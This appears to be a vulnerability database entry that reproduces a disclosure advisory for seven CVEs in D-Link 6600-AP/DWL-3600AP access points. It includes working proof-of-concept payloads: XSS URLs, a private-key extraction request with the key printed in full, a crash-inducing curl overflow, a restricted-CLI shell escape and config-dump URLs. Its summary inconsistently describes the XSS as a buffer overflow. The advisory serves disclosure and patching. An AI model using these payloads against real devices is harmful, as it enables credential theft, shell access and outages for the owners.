ID

VAR-201908-0916

CVE

CVE-2019-14338

TITLE

D-Link 6600-AP and DWL-3600AP Device cross-site scripting vulnerability

DESCRIPTION

An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a post-authentication admin.cgi?action= XSS vulnerability on the management interface. D-Link 6600-AP and DWL-3600AP The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. A buffer overflow vulnerability exists in the D-Link 6600-AP and DWL-3600AP. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. The vulnerability stems from the lack of correct validation of client data in WEB applications. # Security Advisory - 22/07/2019 ## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP ### This advisory is sent to D-Link the 22/05/2019 Many Thanks to the D-Link Security Team for their prompt reactivity! ### Affected Product D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP ### Firmware version 4.2.0.14 Revision Ax date: 21/03/2019 ### Last version available https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ### Product Identifier WLAN-EAP ### Hardware Version A2 ### Manufacturer D-LINK ## Product Description The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ## List of Vulnerabilities 1. CVE-2019-14338 - Post-authenticated XSS 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP 4. CVE-2019-14337 - Escape shell in the restricted command line interface 5. CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth) 7. CVE-2019-14332 - Use of weak ciphers for SSH ### 1. Post-authenticated XSS #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14338 #### Proof-of concept Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script> Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script> ### 2. Post-authenticated Certificate and RSA Private Key extraction through http command #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14334 #### Proof-of concept http://10.90.90.91/sslcert-get.cgi? Result of the command: File "mini_httpd.pem" automatically extracted -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE----- ### 3. Pre-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID: CVE-2019-14333 #### Proof-of concept kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ### 4. Escape shell in the restricted command line interface #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14337 #### Proof-of concept DLINK-WLAN-AP# wget Invalid command. DLINK-WLAN-AP# `/bin/sh -c wget` BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL Retrieve files via HTTP or FTP Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') DLINK-WLAN-AP# ### 5. Post-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14335 #### Proof-of concept http://10.90.90.91/admin.cgi?action=%s ### 6. Post-authenticated Dump all the config files #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14336 #### Proof-of concept http://10.90.90.91/admin.cgi?action= ### 7. Use of weak ciphers #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14332 #### Proof-of concept root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help. DLINK-WLAN-AP# help ## Report Timeline 22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list ## Fixes/Updates ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip ## About me - pwn.sandstorm@gmail.com #### Independent EMSecurity Researcher in the field of IoT under the Sun #### Always open to hack and share #### Greetings - Ack P. Kim and others for the online resources

IOT TAXONOMY

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

XSS

CONFIGURATIONS

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Sandstorm Security

SOURCES

LAST UPDATE DATE

2024-11-23T21:52:00.589000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE